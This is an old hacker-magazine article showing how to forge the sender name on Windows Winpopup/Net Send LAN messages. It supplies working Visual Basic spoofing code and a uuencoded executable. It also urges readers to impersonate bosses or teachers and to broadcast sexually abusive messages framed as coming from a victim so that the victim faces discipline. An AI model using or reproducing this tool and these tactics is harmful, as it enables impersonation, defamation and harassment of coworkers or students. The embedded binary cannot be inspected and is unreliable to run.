________ SWAT MAGAZINE ISSUE TWENTY-FOUR DECEMBER 1999  ________
  /        \______________________________________________/        \
 /                Winpopup/Net Send Message Spoofing                \
/                    By qwaszx <qwaszx@europe.com>                   \
-----------------------------------------------------------------------

Winpopup, as you will most probably know is that lame messaging system
for Windows 95/98 for use across a LAN. And the equivalent of winpopup
in NT is called the messenger service (the command usually used to send
a message is NET SEND computername message, hence the term Net Send used
in the title). When you send a message, a box pops up on their screen
with your message, and also your computer name.

How to forge the origin of the message
--------------------------------------

Both winpopup and net send use exactly the same protocol: Mailslots.
To send the message is bascially writing to a file (The filename being
\\computername\mailslot\messngr) and the format of the message is as
follows:

Computername_to_send_message_to\0Computer_to_send_message_from\0Message\0

Where \0 is the NULL character (00h)
eg. if you wanted to send a message to Computer1 and your computer is
called Computer2 then you would use the following:

Computer1\0Computer2\0Message\0

If you follow this, then you have probably already spotted the problem.
You could type in anything in the from line. Your message could appear
to be from SERVER1 or Firestarter or Administrator or whatever...

Unless your a programmer though, this can get pretty complicated to do,
so I have included some VB source code at the bottom of this file and
also an .exe for you to use (UUENCODED at the bottom of this file - use
winzip or something to extract it).

Uses of this
------------

1. Send a message to everyone (use * as the target) with something
   abusive eg. "Gill sucks cocks for a fiver - enquire at reception"
   with the from line of your victim. Gill will not be best pleased with
   your victim. And if a member of staff (teacher/boss) sees the
   message, which they will if they have a computer on the network, your
   victim could soon be facing some big disciplinary action.

2. Fake a message from the bosses computer (or teachers if you are in
   school/college) to your victim saying something like "Please reprt to
   my office immediately!"

3. Use your imagination - something like "Your computer is infected
   with the Cheese Monster virus" would certainly scre the shit out of
   some poor unsuspecting (Computer illiterate) Lamer.

Have Fun...

VB Source
---------

You need three textboxes (Text1, text2, text3) and one command button
(Command1) on your form, and whatever else you want (labels etc). Change
the names as appropriate and paste the following code into the code
window for form1.

' General Declarations
Const MAILSLOT_WAIT_FOREVER = (-1)
Const OPEN_EXISTING = 3
Const GENERIC_READ = &H80000000
Const GENERIC_WRITE = &H40000000
Const GENERIC_EXECUTE = &H20000000
Const GENERIC_ALL = &H10000000
Const INVALID_HANDLE_VALUE = -1
Const FILE_SHARE_READ = &H1
Const FILE_SHARE_WRITE = &H2
Const FILE_ATTRIBUTE_NORMAL = &H80
Private Declare Function CloseHandle Lib "kernel32" (ByVal hHandle As Long) As Long
Private Declare Function WriteFile Lib "kernel32" (ByVal hFileName As Long, ByVal lpBuff As Any, ByVal nNrBytesToWrite As Long, lpNrOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwAccess As Long, ByVal dwShare As Long, ByVal lpSecurityAttrib As Long, ByVal dwCreationDisp As Long, ByVal dwAttributes As Long, ByVal hTemplateFile As Long) As Long

Private Sub Command1_Click()
	SendMsg(Text1.Text, Text2.Text, Text3.Text)
End Sub

Function SendMsg(From As String, To As String, Text As String) As Long
    Dim rc As Long
    Dim mshandle As Long
    Dim msgtxt As String
    Dim byteswritten As Long
    Dim mailslotname As String
    ' name of the mailslot
    mailslotname = "\\" + To + "\mailslot\messngr"
    msgtxt = From + Chr(0) + To + Chr(0) + Text + Chr(0)
    mshandle = CreateFile(mailslotname, GENERIC_WRITE, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, -1)
    rc = WriteFile(mshandle, msgtxt, Len(msgtxt), byteswritten, 0)
    rc = CloseHandle(mshandle)
End Function

' End of source code

Exe File
--------

This was compiled using VB5, and so you will need MSVBVM50.DLL (Search
for VB5 Runtime Library on any search engine).
Copy this text to msgspoof.uue and decode it.

begin 666 msgspoof.zip
M4$L#!!0````(`%1L*28;\1T(EA,````Z```,````;7-G<W!O;V8N97AE[3H-
M=)-5EC=MH`$+%I8CU:T0M"H(4[_2T*1I*&F;L##;0J0E,(K2T`32FB8A/]",
M+8T+[FEHJW7%L\P<])39[LK9Z>QA/'"L,^!4X0B[!V>ZCNZRGLZ<ZD'Y4);I
M:F>V(]5O[[OO^Y*O)45WU77/RFOO?>_>=^]]]]WW\K[WWO=5/]`-F0"@19`D
M@'[@R0J?G^((LQ?^;#8<F_'ZHGY-U>N+:KT-87TP%-@1<C7IZUU^?R"BW^;1
MAZ)^?8-?;UM?HV\*N#T%LV;-S)=M..P`59II<.6!ORY6[`[#;,U-&NT\6(#$
M'9RW9@ZB'`2!459>SN!^:X#GE(*<T']`U5PI1YTG,Y[0U&*6.U#M)K@VU0&,
M:=+PITA6;%2/^8@5X.QUY`HBGN8(YOEYP!UB?4UV@B<]ME[@=D5<6)XW$WC?
M6:?NF"AG!1@H:.""1[6<`=,1E""GY*P%H7"H'N2^8I\A&^'>='(>7P`%\UE[
M=<!]2XY04JY"^R.]41W/ZAIGA;-ZA5!@JZJ"&^G_?,H"';R^Q`J+[K7"FYA/
M0_KD4BO5G<9<NLM4SO!FPC["RPCK"4<(9Q/>1U@@'"?<3-A->`WA.L(YA$>M
M#!^D\@B5CU`Y2-A`V$&XEW`/81OA%L+S"(^3KI;*1PEO(9Q+^`!A+^%.PD#X
M$&$=X6["BPE;"?<1SB.<3WB,6JFELH5P%>'V<A8M[^B?6$&\(K$UE"7V4[7*
M,?[9HS_]CU>??V/."Y_8[#6U2N39HC)*)4<HT.BICRR'#;]7*D$Z5PBZ][\_
M4?'B)-J\_B=%/]C^JSDO9L/?0]VOGX8OD'Z([6YAA2S8'FJJ=C7X89;F5MC4
MX`\&@M'@?>L\$7V-Q^_6AX.!P'9/"&[50`7<H;T3NR;E3X/5@5!3(=P-]\"*
M[Z"5V]'<2[@VM>!Z8H/5F9+F'N3J=%`9:&IR^=V%H,75O7Q;(!H!;3/4S?A5
MYF[-G"R0,FG!TT&D.5(=WE$;@`SM8$8SS,^Z73,W$ZOU6)TY4ZY>'0HTD<"P
MA@0R4(`M@AF*0"U;39G`0.;\+..TN1J8+TF92U!$,Q/JF]PHPCI%SMS-2[G3
M96<PV)G,Z2P=^+;YN#,:32;4!LPPS:MIAA$X!7.G0RY:7(IRTV?*<N25!BVR
M`LJ.P+#F+S4H.XUD"U!VFB)+#FHT.JCVA,.N'1X4QU4[\X4,%-<R\0PMC@A`
M[D(KY4,+>-Z#.5NF)T^%="EGTO-#21_+SZ^#<ZQ@^/DH."M6+.J</7'1WS.!
MTL(,E:WF>5:X901G-,X`'?"9R^`20B].^TZ$6K3M17HGPO<1'D5H"N^@290J
MI*;Z*!IHS[.2_7B^%?3+K)"-\T@G6.'N'.1C?B].U'+L?0@"T`@>J(<(+(<;
MZ=N:V#S+!#[WE+DS=*>534M:=8>0Q^8/DSF_;>L$W67SK:1GN]TZ@3;,Y[2`
M^0R9SH`7-5[PP:%<M%?$Z\_>5@>UJ.M&L,)","`O<GNJ;99Z4;[GT3K8)_.M
M,!=,R!]!>CIYQ9/I5BL<13E8P/E6F`,6Y&<O8#ZEY`ZBW`#*Y<E\*\RG9\KB
M!:R/*;E1E!M$.9/,9W(V64ZKDO/>QN5L,I_)K9'E,E1R0[*<0^:S?K#-'.M'
MEDK.\:>\'UL6<#Z3<\ARTU1R1V4Y[P+.9_UE2QCKKTXEEY/'^QN1^1&D'Y/'
MF8W+L5NL4,#6,`3S'"M\TVG+U^S3OC3V?7(\OFSJ^P;B^>8WT.;X-]!F?N[7
MVV;5UVP_DL9^["N8=X_Y\K6EF%^Z2<>)&D:\,TNI7X9K=UY^:DW-0_K%27OG
MF;@2LK^A2?XLQC6'[5EFZ#C-CJVL#\R6=^%$63VM3[C^T#H-L#?.-TCG4-\1
M_W4;*]M09S."LD=.;ES@VFWX2Y-\G+Q7ZW_T^MMVMJ5F=@M67AW_I,>;\[Q)
M!TN+=AZO-&]QR'<IJQM\GO`6FV=7323J;@AL<5;@_XJ"]545J.=$U"D_UUB_
MV'/L$-*G$0:7I_K>]]9#\/:ZB6VK=K+PT:0ZU;X9WIU4I]J7I[;P`.KM>&HW
M#:#>!:>.!K*OCWA"?H^OB&++KB,J?8&P9PU*^#RP#Y\%!Q:P/FCA3>S+X2%$
M-PU$,J1A+]L;]Q_%S:(T*`T#FQL`FT(-$0^+%I:9[J"L.\QTQ93NT"1=:C?D
M<7'E<M+-7LAU+S/=T90NVZ.K=5-QVEKI:ZA_A/5#Z:/"R88Z4-([Z](?V]B.
M?#7M=IM`C_N/!O#CKE>/>1AQ",L[(8H4*[GE_MJ18AHA+-^-4(OE+Z++]B75
M6`[CGPMVD&P$<3-B/>ZT7:CO1UN,VD:U'O0JB'2,?&7'@RW\($G745NPUH7V
M?6C/1WJ,P^W[T3[S+S=-FS6(_1`A.W-5]1[2\I#>:H1-6&I`N0C5,)]BB'?"
M;K04QA-',U+;*0[,YB8\-]1BJ8G:<6$]CP?W>Q9%#I`#L!:E7!1OI;<L0D&T
M&4!.&/6V87\\*NN[\9SC(LD8<J*8NRGFN\D_+\71*\<]2&/#>L_:8`=",_6'
M6V(C$:581U">M>?"MIA6%.N#R`E3-/14YZ/(;]VZ:YO+Z0K9HD'8C#0;)[?<
M)O>*><.UE!ZQ<7!1U)0^1,FRGJ*BQW(]:@?PC[5NAN_`$HH/BU(Y]I_UDHV0
MLZ)\A7*O1WZL#GD\-9%054,XDN0A7>F*I.K1UV1=E<=?$8Z$)NNK=6L#&_T-
M]0&W)\GS1&IBX8BGR1X*!4(JN7)_N"$5CW*W.UF'9'5@ER=)$Z%N$P4F^(QT
M;3ABWZF66;^M,5F_)N0)1WV12J^G_A$U'\OH7M*&T@X[DZB3#^ENXHU-STYR
M,^MJ)\DM(#R>E-%,*?/%D_(,9.69,F^S;/,8YK4RJ%,=I*ZBV3E+T9\LI_#/
MXG.&G87&<(ED9;;_'Y?+;(\/1;Q,YQ$LGU.E2Y@V=ES>>SG;RX[][L/,H,.=
MN(OECUU>I@&H<79$=9LZ7MO[_F<)S^C>84W'@C/V,4!I9\(^GHCJI!IMD>1,
MM(J)UN%$ZU"B]5RB]42BM2_1VIMH[4FT=B=:XXF30?0V<;*.L(.PE;!`6$\X
MAS!U[&D='DP<7?8>A_C)AY+4,=)5W7N_LV.ZU-V#GI6>:9WC905O!!\&3H<X
MR&3LO8VZA[LV=G=5GV!MVP\FHMWBJUC35=TC'L%<0F>?UB8-'V9*NJZ-O1L<
MB<?/?X;U3\G&;TD9EXZS&H?HYRV0^;Z4^7K9_%K%/"3-5S"-\\SOFH[,='[7
M.,1<E=5S*:NS9*L??X"YO>_G[2CMZ'J<Q<>1>#87LS-$Z.(`XED4VO[X0*3Z
M)2UDQ!MG)KJ\6+4YT=6,6=<S+)Q=U?'$XQ3[QX.DK$,\@$83QUFU&/N`,9G=
M;F1>&L;M6Y?]!&]):5?5HO/+MYB5;'&0M>BG%L]-V>*%2U^ZQ6<N*2V.LQ;'
M<6KS=CC3HF<AMI]`Z'8DCN<D3:S1)TV8+Y%S0#[:XPYQ"6,0[ACLJAX2[[K$
MQBM.-AHSQ#PD]Y[.1FJ30_Q/$>O(020^($+@Q&]$&F72(K-OB-0`^D)=<8BO
M$(.4,7,0[R=<Z!PRK,0XQ(4$+J0G7KNH8.:@*.ZC=O626M*JLIIL(ZCTD3GE
M%#>(K"?Y7?@3D[PX(-"8N:E1PVX<K5)TR"'.HW:<?V`S7M0@(45[N^Q8\;N+
M;&1ZQ7=8;A_>Y)"BHOC+BV2\%\L.\=\842/^]O<8X#,794WD'Y<UG\>\1MS+
MJH]@\;\Y`;I3HW?@HC+6061V/9-#.MU\K,5=%Y7AF=1['*"ZJ>H<C5K1>)&%
M9EZB==S[W7NM\&$U<_JC]_D/>/G%_TF\&W7B.^]3P$^Q0?M;,C8D/DOY.3%!
M^0GQ,<K[+L4P/]5AUSDZ=-+]NH[JRQWV\:T/NQ-TLGOP'U_5PG66^$[$J+O7
MH_L,UW9<V7-0J`97=F0Z-W7H<,UW2/=K&V=2X#<728VZ1'5/HOKH@XG6(XG6
M@XG6]JZ-[5W5_?0`N*`\`\XG6L\F6OO9>F8_<L;>K;\#Q^&A=O%F]/7E48R_
M]P@BI_CB>\K4O(0EAQ<664'\D<R\(+[)F$[Q*9DQ+)XBJ0B3:GE/^=G]`Y=Z
M1&:<%Y\EJ0$FY<1BPC[893^(H3V"T.](/'1V4Y?]+/XNWF.3\KR#S52<G`@7
M'&SN-4X3;WV/Q3]7K<94<+S_[+WD>'^V%,>[9`H+_WIA*@O3N(53UQ\S>CX_
MAPENI!OI1OI_F19;^3Z>I?YR_MU*NO0:U@TB_!;A"L)G"#D5`'H$`X(-80-"
M'<(NA"<0GD.HR8!X'^8O(PPBO(T@(HPC9%?B>09A&4(%0A6"%V$/PE\A]"#4
MH?X+F+^&,(CP+L(H@LX&<!N"&R"^&/-B!!N"$Z$.(8CP?81]"$\@/&?C_3CQ
M@[;8@;;]L3MG=\;>&.R('=ZV)Q8_V1);FML9V]B\/S:T9W_L27U+[,==C\4^
M/+8G-@-Y'[W;&GO`FH@=QO+AV/[8"VCCIC^VQIY=LB?VW$N=L>&/X[&GT.8_
MM[7%?E'1%OMN?5OL>TOWQ.9]VA[+;]D?VX@ZMI.ML=[#G;'C6/\6VGD+>4?0
MQ@Q6%]X?^\7AEM@Y],F;W1FK1+T?H]S;8ZTQS_/[8P\B_.:CUEC;4&NL&7FL
M'Y._L]E:N;8^$*:2R]VX=7LPXO(3->ELFO9<KCHS7^>DKCXU4QONAEU;FXH-
MJ39#GJ9"E4UV#Y#^%'^=<W7*,ET(JL_9$VH+BQLFR(<4%D8BW)#J>Z7WD7"$
M7<G9G?9UM5MKUJ[[\ZWE;O<&SW95=)33O\WG6QWUUT<:`OY*E\^7ZIF+AU-E
M8X/'YW&%>4RQQ9VAR,3Z^Z.>4&RM/^();7?5)^-J;Z[W!"/\;G/J>X]D-"?W
MD((MCXB#VT)791]\@1W71/":&'%6VMN;"5(3+25'3+YI25'L'DK="WXK0_[(
M,;OF%@8#VQ3U<1EEEE:N]30'4WV;=/^BNB>ZD;[ZE/KVDK]5WHQKZFR@[Y?B
M[-N^Q?Q33Y6<AMZ=QZ?@'[R&GPF%4?9=)\271^F[R'@1YD?3Z+-W.&.<F,!G
M2:=)S\^=@K]X"KX),\?]^&O7RM]+8CJPD7^SI="G-W)]A;[LQ.=61HI^\WLH
MKZI7DDW+?J).J(&MB.VP`4MK83VL0WHMXM589NFD]G>?I;ZD`57.D_8:#@!_
MA#G!!2&TTT#WTFO!3[>Z+.635BW=-OOI'CYUL\S2#.U1;6\FLUN#_!#=_NY(
M8RE.,@(8$$HHKZ#8'-"T:#102>\GFN1[>_;(^6KNY@NH-B+?:+,^LGMM-]VD
MUU-?&JC5$-UMNR"(?^Q.G.FEO\4/TQWZ5WV+OPS8O?EVE29[3\'?D[![]0C=
MZ]^'$LK;EOOHO4H0L8^\8/UB&O7D.VN'Q\U-WMXCOX$)4&]93Z+T+H:/%I,/
M`+_39^\3+)`'RI@$*78QG&4NJF?I>N]"ZL"$NLKXVRAB]326P0GSIER.BY_B
MR=Y.!&4/U&]R>+0#V&\V1LPW@=[65B&]@]YL5))VC%K8@;UFCYTU:'T-+*)V
M##`7Y?GW7OS-2&1"7YJPC1VJ=EA:1FTH?7#*\R/E>R%Z(O"/QF5_)MJ?K*&6
MY_ZLI7G.I/C[F91'Z?RQP6VHLU[N8X.LH_CGGU*W@.8([R?=_(->GT'K*5ME
M"J-Z?0Z6M;0&+8_FY'"*K5!%4?;].ENG]:3)%Z0!F"K%^:H;C_.,_3$6HH$!
MIB71/QX*>,;^)#HC3&60DFYD-\.2-+(["#>C]`@^SBF'"7F<"=\<A]G#K##[
M"L^&T]J<G+@?"$_B,P+7J`'L_4`6PLUIH`W@C*32D?AW_GK@W^4J<8IG3-5:
M_&N)TU>:GI2R@FI*DK)VRPP=/])E[>8,Y8BGU"=I65RA%5O_.W1[NYI.48QF
MU)4K"CV18NEZU#><I+3I%4D:AS;\`2S$_4T6`LO;QD`C?7%8)8UE2M+8*DFZ
MFKX12A/GN88[I9G2U^OX:VF33HTO'%LUGG55&E^(T'95^E2Z/KPB71U?*5T]
M]8HT9EF%^>?[FS[)\1KX^N.5/C+?DH0/CDZ<&UI!)V0+\X0\X0YAL5`@&`2S
M8!56"U7"!F&S\+#@%AJ%H+!+:!'^0F@7GA`."#\4>H2_$_J$%X1^X67AM/!/
MPJ#P+\*0\*X@"E>$4>$3`0JG%V87SBW,+5Q0F%]X;Z%06%QH*:PH7%O8772P
MJ*?H<E&^P6JP&=886@S[#.V&;L,!PT%#7W%_\4#QN>+!8K%XI'BL&(PZ8XXQ
MSZ@W+C,*1HNQREAK=!LCQA9CI_&0L==XS'C:>,XX9+QL'#5J3?-,>:9E)HO)
M9JHUN4T^4XNITW3`=,C48SIBZC,=-1TS]9LL)=826\F:DJJ20R4]);TE1TKZ
M2HZ6C)6,EX!9:]:9?>:@.6)N-K>8A\T7S*+YLGG$7%NZN71+:5VIN_18:7_I
MB=*!TM.E\RRYECR+WI)O66SIM'1;#EGZ+6<M0Y8+EE'+N"5W9=[*LRO/KQQ:
M.;RRIZRWK*_LIV4GREXI&RH;+A/+_KULK.S3LMQ5>:OR5RU995A5L@KH1\O.
MQ;5%[B)O40M&:+AHM&B\"`Q:@]ZPC")597`8:@V;#5L,=0:WP6OP&8*&#L-+
MAO(5SZWXXXI[BEN*GRJ^4IQIK#-&C?N-?V-TE>PJ^66)W_RT^9+Y#^:KYCFE
MQM*'2E\N_9Q9<2-]2])_`5!+`0(4`!0````(`%1L*28;\1T(EA,````Z```,
M````````````(`#_@0````!M<V=S<&]O9BYE>&502P4&``````$``0`Z````
&P!,`````
`
end

---
Written by qwaszx for SWAT Magazine
Send comments, suggestions and praise to <qwaszx@europe.com>
Send Flames to <gillbates@microsoft.com>
Standard disclaimer applies - I am not reponsible for what you do with
this information, and for any inaccuracies. blah.. blah.. blah......